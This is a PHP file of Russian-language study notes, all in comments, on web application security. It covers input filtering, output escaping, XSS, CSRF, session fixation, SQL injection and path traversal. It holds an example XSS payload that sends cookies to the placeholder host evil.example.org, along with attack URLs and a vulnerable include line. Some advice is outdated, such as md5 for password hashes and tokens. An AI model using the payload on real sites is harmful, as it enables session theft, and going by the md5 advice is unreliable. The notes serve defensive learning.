<?php
/**
 * phpsec.org
 * shiflett.org
 */

/*
 * Security
 */

/*
register_globals - не включать
 */

/*
 * error_reporting
 *
 * display_errors, Off
 * уровень error_reporting E_ALL | E_STRICT
 * установить запись ошибок в лог
 *
 *
 */

/*
ini_set('error_reporting', E_ALL | E_STRICT);
ini_set('disable_errors', 'Off');
ini_set('log_errors', 'On');
ini_set('error_log', 'var/www/sitename/error_log');
*/

/**
 * Принципы
 */
 /* Защита в глубину
 * Стоит всегда иметь запасную защиту
 * Как с парашютистом
 * Хоть парашют всегда должен открываться, все равно всегда есть запасной парашют
 *
 * Перед важными действиями запрашивать пароль для переаутетификации пользователя, чтоб убедится что это именно он
 * Доп защита не должна быть избыточной
 *
 * Минимум привилегий
 * Давать доступы только необходимые для данного пользователя
 *
 * Просто и красиво
 *
 * Сложность ведет к ошибкам, код должен быть ясным и понятным
 * Лучше избегать тернарных операторов, и использовать хорошее именование в сложных ситуациях
 *
 * Минимизировать открытость
 * Все чувствительные данные пользователей должны быть зашифрованы
 * И всегда должен использоваться SSL
 * номера карт лучше скрывать оставляя только последние 4 символа
 *
 * Баланс риска и юзабилити
 *
 * Стоит учитывать, что средства защиты не должны усложнять коммуникацию с приложением
 * Например вместо полной переаутентификации просто выводить поле указания пароля
 *
 * Отслеживание данных
 *
 * Следует отслеживать не только что и где. Но также и откуда пришло и куда идет
 * тоесть не только макссивы GET, POST но и места где используются echo и mysqli_query
 *
 *
 * Фильтрация ввода Filter Input
 * Шаги фильтрацйии:
 *
 * Идентификация ввода
 * Фильтрация ввода
 * Разделение чистых данных от грязных
 *
 * Идентификация ввода
 * Надо понимать что приходит извне
 * Например $_GET млм $_POST явно понятно что это клиентский ввод
 * но с $_SERVER это не так явно, но при этом часть данных может быть изменена на клиенте, и поэтому весь массив следует
 * рассматривать как пользовательский ввод
 *
 * Фильтрация ввода
 * Фильтрация это инспекция, и в ней не должно быть исправлений ошибок
 * Пример переданный файл через $_POST
 * в пути могут быть использованы /../ для перехода выше по дереву директорий, поэтому надо чистить этот ввод
 * либо удалять /../ с помощью str_replace либо получать название файла с помощью basename()
 *
 * В прочессе фильтрации создается пустой массив $clean например
 * и после проверки каждый элемент из ввода попадает в этот массив
 * Стоит даже проверять элементы из select чтоб пришли только те значения, которые указаны в option
 * switch($_POST['color]) {
 * case 'red':
 * case 'blue':
 *      $clean['color] = $_POST['color];
 *      break;
 *
 * Проверять имена на ввод только буквенных символов и возможно цифр
 * для английских слов подходит
 *  ctype_alpha() - только буквы
 *  ctype_alnum() - только буквы и цифры
 *  ctype_digits() - только цифры
 *
 * да можно использовать preg_match_all но использование встроенных функций быстрее и безопаснее
 *
 *
 *
 */
/*
if (ctype_digit('13123123123')) {
	echo 'valid';
} else {
	echo 'invalid';
}
*/

// filter_var('dfsfsdfsd@fee.yto', FILTER_VALIDATE_EMAIL);
/*
 * filter_var
 * filter_var ( mixed $variable [, int $filter = FILTER_DEFAULT [, mixed $options ]] ) : mixed
 * Возвращает отфильтрованные данные или FALSE, если фильтрация завершилась неудачей.
 *
 * filter_input Принимает переменную извне PHP и, при необходимости, фильтрует ее
 * filter_input ( int $type , string $variable_name [, int $filter = FILTER_DEFAULT [, mixed $options ]] ) : mixed
 * Одна из констант INPUT_GET, INPUT_POST, INPUT_COOKIE, INPUT_SERVER или INPUT_ENV.
 */

/*
 * Escape output
 * Обезопасить вывод
 * Такие же 3 шага:
 * Определить вывод
 * Очистить вывод
 * Разделить чистые данные от грязных
 *
 * Везде где данные выводятся на экран или заносятся в базу данных они должны быть очищены
 * Именно в таком виде максимальная защита
 * htmlenities($string, ENT_QUOTES, 'UTF-8')
 * ENT_QUOTES - Преобразует как двойные, так и одинарные кавычки.
 *
 * htmlspecialchars() - не такая крутая
 *
 * Для отправляемых данных в бд должна быть использована функция
 * mysqli_real_escape_string()
 * если используется драйвер без поддержки нативного очищений, можно использовать addslashes()
 *
 */
/**
 * Forms and URLs
 */

/* cross-site scripting (XSS) -- межсайтовый скриптинг
 * cross-site request forgeries (CSRF) -- подделка межсайтовых запросов
 * spoof forms and raw HTTP requests manually
 *
 * Пользователь может отправить нам дынные тремя способами
 * В адресе URL (GET запрос)
 * В теле запроса (POST запрос)
 * В заголовке запроса (Header section)
 *
 * Semantic URL Attacks
 * Семантические URL-атаки
 *
 * Пример
 * Восстановление пароля через email
 * Например используя форму восстановленя пароля с указанием секретного вопроса
 * и если пользователь попадает на старницу типа
 *
 * http://example.org/reset.php?user=chris&email=chris%40example.org
 * увидев такую информацию пользователь может подставить другое имя вместо chris и таким образом переписать пароль для другого пользователя
 *
 * Для преодоления этой проблемы необходима активная сессия
 */

/*
session_start();
$clean = array();
$email_pattern = '/^[^@\s<&>]+@([-a-z0-9]+\.)+[a-z]{2,}$/i';
if (preg_match($email_pattern, $_POST['email'])) {
	$clean['email'] = $_POST['email'];
	$user           = $_SESSION['user'];
	$new_password   = md5( uniqid( rand(), true ) );
	if ( $_SESSION['verified'] ) {
		mail( $clean['email'], 'Your New Password', $new_password );
	}
}

* Пользователь получается из сессии, а также в сессии храниться дополнительно значение verified
*/

/*
 * File Upload Attacks
 * Атаки с загрузкой файлов
 *
 * <input type="hidden" name="MAX_FILE_SIZE" value="1024" />
 * Должен быть перед полем загрузки для ограничения размера загружаемого файла на стороне клиента, но конечно нельзя
 * полагатся на это поле в php скрипте на стороне сервера
 *
 * Как дополнительный шаг верификации файла
 * следует использовать
 * is_uploaded_file() - Определяет, был ли файл загружен при помощи HTTP POST
 * move_uploaded_file() - Перемещает загруженный файл в новое место, сначала метод проверяет что файл был загружен с помощью HTTP POST
 */

/*

$filename = $_FILES['attachment']['tmp_name'];
if (is_uploaded_file($filename))
{
}
*/
/*
$old_filename = $_FILES['attachment']['tmp_name'];
$new_filename = '/path/to/attachment.txt';
if (move_uploaded_file($old_filename, $new_filename))
{

}
*/

/*
 * И на последок ткже можно проверить размер файла
$filename = $_FILES['attachment']['tmp_name'];
if (is_uploaded_file($filename))
{
$size = filesize($filename);
}
*/

/*
 * Cross-Site Scripting XSS
 */
/*
 * Пример того что можно передать в поле комментария
<script>
document.location =
'http://evil.example.org/steal.php?cookies=' +
document.cookie
</script>

* Использование htmlentities сделает скрипт не рабочим преобразовав теги в html сущности
$html['name'] = htmlentities($clean['name'], ENT_QUOTES, 'UTF-8');
$html['comment'] = htmlentities($clean['comment'], ENT_QUOTES, 'UTF-8');

 */
/*
 * Cross-Site Request Forgeries -- Подделка межсайтовых запросов
 *
 * Если злоумышленник смог получить доступ к станице например покупки товара, он может использовать этот урл подставив его например вместо адреса картинки,
 * на другом ресурсе. Таким образом будет отправлен запрос. Если использовать GET запрос для процесса покупки, это легко сделать через адресс ссылки.
 * POST в этом случае безопаснее, но все-равно не на 100%
 * В таком случае нужен токен, который хранится в сессии и имеет короткий срок жизни. Страница процессинга формы должна проводить инспекцию токена и время его жизни
 */

/*
 * Spoofed Form Submissions -- Поддельная отправка формы
 *
 * Подделка формы на отдельном ресурсе
 * Злоумышленник может взять html код и разместить на своем ресурсе, убрав все огрничения, и сделав процесс отправки проще.
 * снизить влияние таких форм, можно с помощью проверки заголовка Referer
 */
/*
 * Spoofed HTTP Requests -- поддельные HTTP запросы
 * Если полагаться только на $_SERVER['HTTP_REFERER'] то можно пропустить другой вид атаки, подделка всего HTTP запроса.
 * Ведь с помощью telnet утилит можно изменить не только содержимое запроса, но и заголовки
 */
/*
$fp = fsockopen('example.org', 80);
fputs($fp, "GET / HTTP/1.1\r\n");
fputs($fp, "Host: example.org\r\n\r\n");
*/
/**
 * Databases and SQL
 */
/*
 * Получение конфигурации БД
 *
 * Если настройки базы данных храняться в файле с расширением которое распознается сервером как plain/text то прямой доступ
 * через URL покажет содержимое этого файла. Следует избегать таких файлов, использовать .env  и выносить такие конфиги за пределы корневой папки сайта
 * если это не доступно следует применить настройки apache или nginx закрыть доступ к этим файлам
 *
<Files ~ "\.inc$">
Order allow,deny
Deny from all
</Files>

 */
/*
 * SQL Injection -- SQL иньекции
 *
 * хеш пароля с помощью md5 не безопасен, и поэтому стоит использовать salt для хеша, а не просто пароль
 * $salt = 'SHIFLETT';
 * $password_hash = md5($salt . md5($_POST['password'] . $salt));
 *
 * Использование mysql_error
 *
 * mysql_query($sql) or exit(mysql_error());
 *
 * В случае намеренной ошибки , ввести одинарную кавычку злоумышленник может получить вывод ошибки содержащей поля используемые в запросе
 *
 *
 */
/*
 * Exposed Data - Обнаженные(открытые) данные
 * Скрывать чувствительные данные в бд с помощью криптографии
 */
/**
 * Sessions and cookies
 */
/*
 * По причине того что HTTP протокол не имеет состояния и не имеет связи между запросами
 * Было разработано расширение Cookie для передачи данных между запросами
 *
 * Cookie Theft - кража куки
 *
 * Exposed Session Data - видимые данные сессии
 * session_set_save_handler Устанавливает пользовательские обработчики хранения сессии
 *
 * Session Fixation -- Фиксация сессии
 * В случае когда на странице надо загрузить 10 картинок id сессии будет передан между сервером и клиентом 11 раз,
 *  чтоб убрать лишнее отображение id сессии стоит хранить картинки на отдельном сервере
 *
 * Злоумышленник может заставить жертву использовать нужный id сессии указав его в ссылке
 * <a href="http://example.org/index.php?PHPSESSID=1234">Click Here</a>
 *
 * или используя редирект
 * header('Location: http://example.org/index.php?PHPSESSID=1234');
 *
 * Подменив id сессии для жертвы злоумышленник сам может использовать ее в своих целях.
 * Используют для получения сессии пользователя с высокими правами доступа
 * Как выход перегенерация id сессии при изменении привилегий
 *
 * Session Hijacking - Угон сессии
 *
 * Возможное прикрытие от угона сессии проверка на то каким браузером пользуется поьлзователь, и IP
 *
 */
/*
session_start();
if (isset($_SESSION['HTTP_USER_AGENT']))
{
	if ($_SESSION['HTTP_USER_AGENT'] != md5($_SERVER['HTTP_USER_AGENT']))
	{
		exit;
	}
}
else
{
	$_SESSION['HTTP_USER_AGENT'] = md5($_SERVER['HTTP_USER_AGENT']);
}
*/

/*
 * Введение токена в урл в защищенной зоне
 * Токен должен быть максимально непредсказуемым
 * Если не хочется полагаться на User-Agent
 * можно использовать генерацию
 * rand() без параметров возвращает число в диапазоне от 0 до  getrandmax()
 * uniqid — Сгенерировать уникальный ID
 * uniqid ([ string $prefix = "" [, bool $more_entropy = FALSE ]] ) : string
 * md5(uniqid(rand(), TRUE));
 */
/**
 * Includes
 */
/*
 * В инструкциях include, include_once, require, require_once - следует избегать использования нефильтроанных данных,
 * например подключать файл основываясь на GET параметре, в таком случае всегда стоит использовать функцию basename()
 * для фильтрации имени файла. В имя файла могут передать \..\ что позволит смотреть на каталог выше по дереву
 *
 * Code Injection -- Иньекции кода
 *
 * Если в функции include из пользовательского ввода встраивается pathname, то в этом случае злоумышленник может подставить
 * свой домен и запустить таким образом php скрипт на своем ресурсе
 *
 * include $_GET['path'] . '/file.php';
 *
 * Всегда надо фильтровать пользовательский ввод
 *
 */
/**
 * Files and Commands
 */
/*
 * Traversing the Filesystem -- Обход файловой системы
 *
 * опасность возникает всегда, когда разработчик получает данные любого файла с помощью пользовательского ввода и массива $_GET
 * даже если в конце указано расширение это ограничение атакующий может обойти указав NULL %00 в конце названия файла,
 * что позволит пропустить любой файл из любого места
 * http://example.org/file.php?filename=../../../../../another/path/to/file
 *
 */
/*
if (basename($_GET['filename']) == $_GET['filename'])
{
	$clean['filename'] = $_GET['filename'];
}
 */
/*
 * Remote File Risks

$contents = file_get_contents('http://example.org/');
$contents = file_get_contents($_GET['filename']);
Если подставляем не фильтрованные данные из запроса, злоумышленник можето подставить любой файл
также всегда следует фильтровать и $content. рассматривать его как ввод
 */
/*
 * Command Injection -- Иньекция комманды
 * Убедится что в эти функции попадают фильтрованные данные
 * exec(), passthru(), popen(), shell_exec(), system().
 */
/**
 * Authentication and Authorization
 */
/*
 * brute force attacks , password sniffing, replay attacks, persistent logins
 * атаки грубой силы, перехват пароля, повторяющиеся атаки, постоянные логины
 */